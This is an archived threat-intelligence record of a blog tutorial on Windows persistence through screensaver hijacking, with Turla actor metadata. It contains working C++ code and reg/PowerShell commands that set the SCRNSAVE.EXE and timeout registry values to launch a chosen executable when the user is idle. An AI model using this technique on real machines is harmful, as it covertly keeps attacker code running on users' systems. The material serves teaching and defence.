{ "id": "83074e6a-8b69-4a8e-bb98-5058b29cf81f", "created_at": "2026-04-06T01:30:45.185065Z", "updated_at": "2026-04-10T03:33:35.777455Z", "deleted_at": null, "sha1_hash": "4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8", "title": "Malware development: persistence - part 2. Screensaver hijack. C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1165902, "plain_text": "Malware development: persistence - part 2. Screensaver hijack.\r\nC++ example.\r\nBy cocomelonc\r\nPublished: 2022-04-26 · Archived: 2026-04-06 00:58:57 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is a second part of a series of articles on windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into another persistence trick: Abusing screensavers.\r\nscreensaversPermalink\r\nScreensavers are programs that execute after a configurable time of user inactivity. This feature of Windows it is\r\nknown to be abused by threat actors as a method of persistence. Screensavers are PE-files with a .scr extension\r\nby default and settings are stored in the following registry keys:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 1 of 8\n\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\ScreenSaveActive\r\nset to 1 to enable screensaver.\r\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\ScreenSaveTimeOut - sets user inactivity timeout before screensaver\r\nis executed.\r\nHKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE - set the app path to run.\r\npractical examplePermalink\r\nLet’s go to look at a practical example. Let’s say we have a “malware” from previous part hack.cpp :\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBoxA(NULL, \"Meow-meow!\",\"=^..^=\", MB_OK);\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 2 of 8\n\nreturn 0;\r\n}\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -mwindows -I/usr/share/mingw-w64/include/ -s -ffunction-section\r\nAnd save it to folder Z:\\\\2022-04-26-malware-pers-2\\ :\r\nThen, let’s create a script pers.cpp that creates registry keys that will execute our program hack.exe when\r\nuser inactive 10 seconds:\r\n/*\r\npers.cpp\r\nwindows low level persistense via screensaver\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint reg_key_compare(HKEY hKeyRoot, char* lpSubKey, char* regVal, char* compare) {\r\n HKEY hKey = nullptr;\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 3 of 8\n\nLONG ret;\r\n char value[1024];\r\n DWORD size = sizeof(value);\r\n ret = RegOpenKeyExA(hKeyRoot, lpSubKey, 0, KEY_READ, \u0026hKey);\r\n if (ret == ERROR_SUCCESS) {\r\n RegQueryValueExA(hKey, regVal, NULL, NULL, (LPBYTE)value, \u0026size);\r\n if (ret == ERROR_SUCCESS) {\r\n if (strcmp(value, compare) == 0) {\r\n return TRUE;\r\n }\r\n }\r\n }\r\n return FALSE;\r\n}\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // malicious app\r\n const char* exe = \"Z:\\\\2022-04-26-malware-pers-2\\\\hack.exe\";\r\n // timeout\r\n const char* ts = \"10\";\r\n // activation\r\n const char* aact = \"1\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)\"Control Panel\\\\Desktop\", 0 , KEY_WRITE, \u0026hkey);\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry keys\r\n RegSetValueEx(hkey, (LPCSTR)\"ScreenSaveActive\", 0, REG_SZ, (unsigned char*)aact, strlen(aact));\r\n RegSetValueEx(hkey, (LPCSTR)\"ScreenSaveTimeOut\", 0, REG_SZ, (unsigned char*)ts, strlen(ts));\r\n RegSetValueEx(hkey, (LPCSTR)\"SCRNSAVE.EXE\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAs you can see, logic is simplest one. We just add new registry keys for timeout and app path. Registry keys can\r\nbe added from the cmd terminal:\r\nreg add \"HKCU\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /d 10\r\nreg add \"HKCU\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /d Z:\\2022-04-26-malware-pers-2\\hack.exe\r\nor powershell commands:\r\nNew-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop\\' -Name 'ScreenSaveTimeOut' -Value '10'\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 4 of 8\n\nNew-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop\\' -Name 'SCRNSAVE.EXE' -Value 'Z:\\2022-04-26-malware-pers-2\\\r\nbut since I love to write code, I wanted to show how to do it with some lines of code.\r\ndemoPermalink\r\nLet’s compile our pers.cpp script:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, for the purity of experiment, first of all, check registry keys in the victim’s machine and delete keys if\r\nexists:\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'ScreenSaveTimeOut'\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'SCRNSAVE.EXE'\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 5 of 8\n\nThen, run our pers.exe script and check again:\r\n.\\pers.exe\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 6 of 8\n\nAs you can see, new key added as expected.\r\nSo now, check everything in action. Logout and login again and wait 10 seconds or just inactive 10 seconds:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 7 of 8\n\nPwn! Everything is worked perfectly :)\r\nAfter the end of the experiment, delete the keys:\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'ScreenSaveTimeOut'\r\nRemove-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name 'SCRNSAVE.EXE'\r\nreg query \"HKCU\\Control Panel\\Desktop\" /s\r\nconclusionPermalink\r\nThe problem with this persistence trick is that the session is terminated when the user comes back and the system\r\nis not idle. However, red teams can perform their operations (something like coin miner) during the user’s\r\nabsence. If screensavers are disabled by group policy, this method cannot be used for persistence. Also you can\r\nblock .scr files from being executed from non-standard locations.\r\nThis trick is used by Gazer software and Turla APT in the wild.\r\nThis trick in MITRE ATT\u0026CK\r\nGazer\r\nTurla\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nRegCloseKey\r\nRemove-ItemProperty\r\nreg query\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nhttps://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html" ], "report_names": [ "malware-pers-2.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439045, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.pdf", "text": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.txt", "img": "https://archive.orkl.eu/4b47a80a2983729a26ea1d4b658bbdb0a9ca13b8.jpg" } }